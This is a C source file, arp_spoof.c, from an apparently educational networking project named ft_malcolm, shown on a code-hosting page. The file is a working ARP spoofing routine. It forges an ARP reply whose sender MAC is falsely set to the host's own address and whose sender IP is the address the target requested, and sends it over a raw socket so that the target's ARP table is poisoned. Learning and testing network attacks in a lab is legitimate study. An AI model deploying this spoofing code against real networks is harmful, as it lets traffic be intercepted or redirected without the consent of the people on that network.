-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy patharp_spoof.c
83 lines (68 loc) · 2.84 KB
/
arp_spoof.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#include "ft_malcolm.h"
/*
Ethernet Header
|- Destination MAC Address
|- Source MAC Address
|- EtherType (ARP: 0x0806)
ARP Header
|- Hardware Type (Ethernet: 1)
|- Protocol Type (IPv4: 0x0800)
|- Hardware Address Length (MAC address length: 6)
|- Protocol Address Length (IPv4 address length: 4)
|- Operation (ARP Reply: 2)
|- Sender MAC Address
|- Sender IP Address
|- Target MAC Address
|- Target IP Address
Payload (if any)
*/
_mc_t_packet _mc_create_packet_for_spoofing(void)
{
// Create the ARP reply packet
_mc_t_packet packet;
// Init packet to zero
_mc_bzero(&packet, sizeof(_mc_t_packet));
// Assign
packet.ethernet_header = *_mc_g_data.ethernet_header;
packet.arp_packet = *_mc_g_data.arp_packet;
/* Spoofing the ethernet header */
// The destination MAC is set to the target's MAC address
_mc_memcpy(packet.ethernet_header.h_dest, _mc_g_data.ethernet_header->h_source, ETH_ALEN);
// The source MAC is falsly set to the host's MAC address
_mc_memcpy(packet.ethernet_header.h_source, _mc_g_data.host_mac, ETH_ALEN);
/* Spoofing the arp packet */
// The target MAC is replaced by the ARP request's MAC address
_mc_memcpy(packet.arp_packet.arp_tha, packet.arp_packet.arp_sha, ETH_ALEN);
// Again, the source MAC is falsly set to the host's MAC address
_mc_memcpy(packet.arp_packet.arp_sha, _mc_g_data.host_mac, ETH_ALEN);
// The sender's IP is falsly set to the former target IP address of the ARP request
_mc_memcpy(packet.arp_packet.arp_spa, packet.arp_packet.arp_tpa, _MC_IPV4_BYTE_SIZE);
// The target's IP is the one given from the command line
_mc_memcpy(packet.arp_packet.arp_tpa, _mc_g_data.target_ip, _MC_IPV4_BYTE_SIZE);
return packet;
}
void _mc_run_arp_spoofing(void)
{
_mc_t_packet packet = _mc_create_packet_for_spoofing();
/* Send the fake ARP reply using the custom packet
(Destination port is inside src_addr) */
printf(_MC_YELLOW_COLOR
">> Now sending an ARP reply to the target address with spoofed source <<"
_MC_RESET_COLOR "\n\n"
);
printf("Ethernet header:\n");
printf("h_dest: ");_mc_print_mac(packet.ethernet_header.h_dest);
printf("h_src: "); _mc_print_mac(packet.ethernet_header.h_source);
printf("\nARP header:\n");
printf("tha: ");_mc_print_mac(packet.arp_packet.arp_tha);
printf("sha: ");_mc_print_mac(packet.arp_packet.arp_sha);
printf("spa: ");_mc_print_ip(packet.arp_packet.arp_spa);
printf("tpa: ");_mc_print_ip(packet.arp_packet.arp_tpa);
int ret = sendto(
_mc_g_data.raw_sockfd, &packet, sizeof(_mc_t_packet), 0,
(struct sockaddr *)&_mc_g_data.src_addr, sizeof(struct sockaddr_ll)
);
if (ret <= 0) fprintf(stderr, _MC_RED_CROSS "Failed to send the ARP reply\n");
else
printf("\nSent an ARP reply packet, you may now check the arp table on the target\n");
}